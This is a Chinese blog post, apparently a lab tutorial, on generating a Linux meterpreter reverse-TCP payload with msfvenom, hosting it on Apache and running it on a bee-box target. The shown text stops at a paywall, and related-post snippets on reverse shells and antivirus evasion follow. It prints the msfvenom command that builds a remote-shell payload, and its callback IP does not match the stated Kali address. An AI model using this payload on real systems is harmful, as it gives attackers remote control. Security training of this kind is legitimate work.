信息安全技术(二)-- 利用 metasploit 创建并反弹 shell

已于 2023-06-30 13:04:10 修改
阅读量467 收藏 2
点赞数 1
文章标签: linux tomcat 服务器
于 2023-06-19 22:21:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yi23456qi/article/details/131295718
版权
本文介绍了如何利用Metasploit在Linux环境下创建并反弹shell,详细步骤包括使用msfvenom生成payload,通过Apache服务分发,设置监听,最终在靶机上执行并获取shell。实验有助于理解Metasploit在安全测试中的应用。
摘要由CSDN通过智能技术生成

目录

介绍:

一、环境准备

二、利用 metasploit 创建并反弹 shell 案例

1、利用msfvenom生成一个反弹shell程序 ​编辑

2、将liang_dolphin.bin 这个payload文件复制放到/var/www/html/下

3、打开msfconsole创建侦察监听

4、在根目录启动apache服务 ​编辑

5、bee-box靶机浏览器访问kali下载payload文件

6、在bee-box靶机终端给liagn_dolphin.bin文件权限,并执行liang_dolphin.bin文件

7、metasploit 侦听器就会收到一个连接请求(可以获取到shell)

8、总结

介绍:

       Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报

一、环境准备

        实验设备:kali虚拟机和bee-box靶机

        kali IP:192.168.17.128 、 bee-box靶机 IP:192.168.17.129

二、利用 metasploit 创建并反弹 shell 案例

1、利用msfvenom生成一个反弹shell程序 

 操作命令:生成反弹shell程序

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.11.130LPORT=4443 -f elf > liang_dolphin.bin

2、将liang_dolphin.bin 这个payload文件复制放到/var/www/html/下

 操作命令:复制放到/var/www/html/下

cp liang_dolphin.bin /var/www/html/

3、打开msfconsole创建侦察监听

最低0.47元/天 解锁文章
21计算机网络技术2班梁昌华
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用 metasploit 创建反弹 shell
2301_78457119的博客
06-29 340
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。1 环境准备1.开启Kali虚拟机和bee-box靶机1.首先用 msfvenom 生成一个反弹 shell 的程序,将返回的连接地址修改为kali的 ip 地址。在 kali 中打开终端,输入:当我们在服务器。
反弹Shell,看这一篇就够了
Appleteachers的博客
04-24 1170
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
Metasploit 生成***反弹shell
weixin_34372728的博客
04-27 2494
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报特点:这种可以扩展的模型将负载控制,编码器,无操作生成器和漏洞整合在一起,使 Metasploit Framework 成为一种研究高危漏洞的途径。它集成了各平台上常见的溢出漏洞和流行的 shellcode ,并且不断更新。最新版本的...
记录一次linux内网完整渗透测试
NZXHJ的博客
07-18 3524
记录一次完整系统的linux内网渗透测试
Bash反弹shell & 搭建网页服务器 & 文件描述符学习 & ssh连接vm虚拟机 & sftp进行文件传输 & Linux抓包
最新发布
一个啥也不会的小菜鸡!
05-22 1112
环境: kali: 1. 建立一个简单的链接进行nc,可以进行两个端口通信! 2. 试图向发送数据失败! 原因:反弹shell失败 原来是这个原因_反弹shell时kali监听不到端口数据怎么办-CSDN博客 kali无法实现因为:kali的bash是默认关闭bash的网络重定向选项,也就是–enable-net-redirections选项 解决方法重写下载bash并重新编译: 3.在Ubuntu上实现向本地端口发送数据 这个文件路径是虚拟的: tty1: tty2: 4.实现反弹shell 攻击者机
如何用内网虚拟机kali实现反弹shell
qq_44657899的博客
05-23 9498
文章目录实验环境设置端口转发反弹shell验证为什么要反弹shell? 这里我讲述的是NAT模式下的反弹shell,因为个人感觉NAT模式方便一点。 实验环境 攻击机:kali虚拟机(位于内网) ip:192.168.77.128 宿主机:win10(位于外网) ip:10.8.163.224 受害端:centos-7 设置端口转发 虚拟机集群此时相当于在内网中,而要实现反弹shell,我们的受害端centos7必须要能够连接我们的虚拟机kali。可以通过端口转发的功能来实现,比如我
反弹meterpreter方法
wutiangui的博客
04-25 146
靶机执行shell.exe即可反弹meterprete。//192.168.25.128是攻击机IP。msfconsole下依次执行如下命令。启动 msfconsole。[run] 开始监听即可。
第70天:内网安全-域横向内网漫游Socks代理隧道技术1
08-03
我们首先生成Linux后门,然后通过Metasploit框架接收反弹shell利用获取的权限,收集网络信息,添加路由,开启Socks4a代理。在Linux系统中,通过proxychains配置代理,访问其他内网目标。 这些案例展示了内网穿透...
Metasploit后渗透模块开发-三米前有蕉皮1
08-03
- **Stagers** 需要与Metasploit建立连接,但功能较简单,如反弹shell。 - **Stages** 包含Meterpreter,这是一个功能强大的高级payload。 5. **post**:后渗透模块,用于在成功渗透后进一步控制目标系统。 在...
2021年江苏省职业院校技能大赛-网络信息安全赛项试卷-学生组V4(1).docx
07-09
- 木马与反制:理解反弹shell原理,会使用MSF(Metasploit Framework)进行监听和控制。 - 团队协作:在分组对抗中,需要良好的沟通和协同作战能力。 此赛项全面检验了中职学生的网络安全实战技能,有助于培养他们...
网络安全夺旗5个flag靶机详细实操教程
06-14
接着,教程展示了如何利用Python反弹shell,以及通过find命令查找并利用具有root权限的文件(如`passwd`)进行提权。 在提权成功后,根据flag1.txt的提示,搜索配置文件,找到了flag2,并在过程中发现了MySQL数据库...
利用 metasploit 创建反弹 shell实验
m0_68638628的博客
07-01 212
metasploit是一款开源的安全漏洞检测工具,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具,是世界上使用最多的渗透实用程序。Metaloit的设计初衷是打造成一个攻击工具开发平台,IT专业人士借助其识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。
反弹shell在线命令生成平台
siu~
08-15 593
在线反弹shell命令生成平台
【P3】最强渗透工具 - metasploit(安装配置及使用教程详解)
qq_45138120的博客
06-23 7936
包括 metasploit 是什么?、metasploit 攻击 windows 操作系统、metasploit 攻击永恒之蓝全流程、使用 Kali 渗透工具生成远控木马、metasploit 攻击示例、msfvenom 绕过杀毒软件技巧之捆绑木马、msfvenom 绕过杀毒软件技巧之加壳、windows 下安装 Themida、Themida 使用教程。
反弹Shell的基本操作
weixin_46831054的博客
11-26 996
反弹shell定义: 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连
安全知识】——LInux的shell反弹姿势合集(更新中)
Demo不是emo的博客
05-17 6087
当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。
windows 反弹shell_怎么反弹shell(reverse shell
weixin_39956451的博客
11-19 2130
在我们渗透测试的过程中,最常用的就是基于tcp/udp协议反弹一个shell,也就是反向连接。我们先来讲一下什么是正向连接和反向连接。正向连接:我们本机去连接目标机器,比如ssh和mstsc反向连接:目标机器去连接我们本机那么为什么反向连接会比较常用呢目标机器处在局域网内,我们正向连不上他目标机器是动态ip目标机器存在防火墙然后说一下我的实验环境虚拟机采用nat模式攻击机:Kali Linux :...
Windows10与虚拟机win7在vmnet1(仅主机模式下)使用nc进行反弹shell练习
m0_47402792的博客
01-07 459
Windows10与虚拟机win7在vmnet1(仅主机模式下)使用nc进行反弹shell练习
metasploit 反弹shell
10-16
Metasploit 是一款常用的渗透测试工具,可以用来测试网络安全反弹 shellMetasploit 中的一个常用功能,可以通过它在目标机器上执行命令或者获取目标机器的控制权。具体操作步骤如下: 1. 打开 Metasploit ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值